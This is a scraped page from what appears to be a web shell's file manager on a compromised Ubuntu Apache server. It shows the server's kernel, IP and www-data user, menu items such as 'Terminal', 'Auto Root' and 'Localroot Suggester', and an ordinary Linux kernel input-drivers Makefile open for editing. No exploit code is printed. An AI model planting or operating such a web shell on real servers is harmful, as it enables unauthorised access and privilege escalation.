Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
linux-headers-4.4.0-209 /
drivers /
input /
Delete
Unzip
Name
Size
Permission
Date
Action
gameport
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
joystick
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
keyboard
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
misc
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
mouse
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
serio
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
tablet
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
touchscreen
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
Kconfig
5.95
KB
-rw-r--r--
2016-01-11 00:01
Makefile
874
B
-rw-r--r--
2016-01-11 00:01
Save
Rename
# # Makefile for the input core drivers. # # Each configuration option enables a list of files. obj-$(CONFIG_INPUT) += input-core.o input-core-y := input.o input-compat.o input-mt.o ff-core.o obj-$(CONFIG_INPUT_FF_MEMLESS) += ff-memless.o obj-$(CONFIG_INPUT_POLLDEV) += input-polldev.o obj-$(CONFIG_INPUT_SPARSEKMAP) += sparse-keymap.o obj-$(CONFIG_INPUT_MATRIXKMAP) += matrix-keymap.o obj-$(CONFIG_INPUT_LEDS) += input-leds.o obj-$(CONFIG_INPUT_MOUSEDEV) += mousedev.o obj-$(CONFIG_INPUT_JOYDEV) += joydev.o obj-$(CONFIG_INPUT_EVDEV) += evdev.o obj-$(CONFIG_INPUT_EVBUG) += evbug.o obj-$(CONFIG_INPUT_KEYBOARD) += keyboard/ obj-$(CONFIG_INPUT_MOUSE) += mouse/ obj-$(CONFIG_INPUT_JOYSTICK) += joystick/ obj-$(CONFIG_INPUT_TABLET) += tablet/ obj-$(CONFIG_INPUT_TOUCHSCREEN) += touchscreen/ obj-$(CONFIG_INPUT_MISC) += misc/ obj-$(CONFIG_INPUT_APMPOWER) += apm-power.o